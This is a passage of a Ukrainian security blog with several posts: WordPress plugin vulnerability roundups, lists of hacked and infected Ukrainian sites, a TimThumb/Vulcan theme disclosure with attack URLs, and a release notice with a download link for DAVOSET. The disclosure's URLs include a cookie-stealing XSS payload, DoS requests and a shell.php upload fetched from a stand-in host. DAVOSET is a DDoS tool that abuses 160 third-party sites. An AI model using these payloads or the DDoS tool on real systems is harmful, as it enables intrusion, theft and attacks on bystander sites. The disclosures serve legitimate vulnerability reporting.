Websecurity - Веб безпека

Дев’ять років тому, 18.07.2006, мій проект розпочав свою роботу. Так що в липні виповнилося дев’ять років з моменту початку офіційної роботи проекту Websecurity - Веб безпека. З чим вас і себе поздоровляю .

За останній рік роботи проекту було зроблено чимало і ще багато чого заплановано. Зокрема мною були оновлені DAVOSET і Тестування по веб безпеці.

Також опубліковано багато цікавих статей та досліджень.

Багато цікавого ще попереду, тому слідкуйте за новинами.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в WordPress 4.0 та в плагінах Html5 Mp3 Player, Sexy Squeeze Pages, Ad-Manager, CM Download Manager. Для котрих з’явилися експлоіти.

• WordPress Html5 Mp3 Player Full Path Disclosure (деталі)
• WordPress Sexy Squeeze Pages Cross Site Scripting (деталі)
• WordPress Ad-Manager 1.1.2 Open Redirect (деталі)
• WordPress 4.0 Denial Of Service (деталі)
• WordPress CM Download Manager 2.0.6 XSS / CSRF (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://ipo.gov.ua (хакером Moroccan Agent Secret) - 06.04.2015 - похаканий державний сайт, зараз сайт вже не працює
• http://zhytomyr.man.gov.ua (хакерами з Fallaga Team) - 26.06.2015 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://autodop.kiev.ua (хакерами Lakhdar Dz і Moh Ooasiic)
• http://judiciary.chv.ua (хакером AKINCILAR) - 18.04.2015, зараз сайт вже виправлений адмінами
• http://www.sport-uprav.cv.ua (хакером Karim-TN) - 29.04.2015, зараз сайт вже виправлений адмінами

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).

У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://patoka.in.ua - інфекція була виявлена 30.06.2015. Зараз сайт входить до переліку підозрілих.
• http://globalmarket.com.ua - інфекція була виявлена 23.06.2015. Зараз сайт не входить до переліку підозрілих.
• http://patoka.ua - 30.06.2015. Зараз сайт входить до переліку підозрілих.
• http://forbs.com.ua - 30.06.2015. Зараз сайт не входить до переліку підозрілих.
• http://dominanta-ukr.com - 30.06.2015. Зараз сайт не входить до переліку підозрілих.

Сьогодні вийшла нова версія програми DAVOSET v.1.2.5. В новій версії:

• Додав підтримку обходу кешу на веб сайтах.
• Додав нові сервіси в повний список зомбі.
• Прибрав неробочі сервіси з повного списку зомбі.

Всього в списку міститься 160 зомбі-сервісів, які готові нанести удар проти диктатури.

DDoS attacks via other sites execution tool (DAVOSET) - це інструмент для використання Abuse of Functionality та XML External Entities уразливостей на одних сайтах, для проведення DoS і DDoS атак на інші сайти.

Скачати: DAVOSET_v.1.2.5.rar.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в WordPress 3.9.2 та в плагінах SP Client Document Manager, WP-DB-Backup, wpDataTables. Для котрих з’явилися експлоіти.

• WordPress 3.9.2 Cross Site Scripting (деталі)
• WordPress SP Client Document Manager 2.4.1 SQL Injection (деталі)
• WordPress WP-DB-Backup 2.2.4 Backup Theft (деталі)
• WordPress wpDataTables 1.5.3 Shell Upload (деталі)
• WordPress wpDataTables 1.5.3 SQL Injection (деталі)

Експлоіт для WP-DB-Backup використовує уразливість, що я знайшов в 2007 році й опублікував в День багів в WordPress 2.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.usm.voladm.gov.ua (хакером Moroccan Agent Secret) - 06.04.2015 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.chat.voladm.gov.ua (хакером Moroccan Agent Secret) - 06.04.2015 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://mei.btsau.edu.ua (хакером Virus IRAQ)
• http://www.ozerki.com.ua (хакерами з Team_CC)
• http://sdshoes.kiev.ua (хакером MASKHACKER)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Bulletproof-Security, XCloner, Another WordPress Classifieds, SupportEzzy Ticket System, CM Download Manager. Для котрих з’явилися експлоіти.

• WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF (деталі)
• Joomla/WordPress XCloner Command Execution / Password Disclosure (деталі)
• Another WordPress Classifieds Cross Site Scripting / SQL Injection (деталі)
• WordPress SupportEzzy Ticket System 1.2.5 Cross Site Scripting (деталі)
• WordPress CM Download Manager 2.0.0 Code Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://martem.com.ua - інфекція була виявлена 22.06.2015. Зараз сайт входить до переліку підозрілих.
• http://lviv.mobi - інфекція була виявлена 14.05.2015. Зараз сайт не входить до переліку підозрілих.
• http://ekastroy.com.ua - інфекція була виявлена 09.06.2015. Зараз сайт входить до переліку підозрілих.
• http://cdd.net.ua - інфекція була виявлена 22.06.2015. Зараз сайт не входить до переліку підозрілих.
• http://biblprog.org.ua - інфекція була виявлена 30.06.2015. Зараз сайт не входить до переліку підозрілих.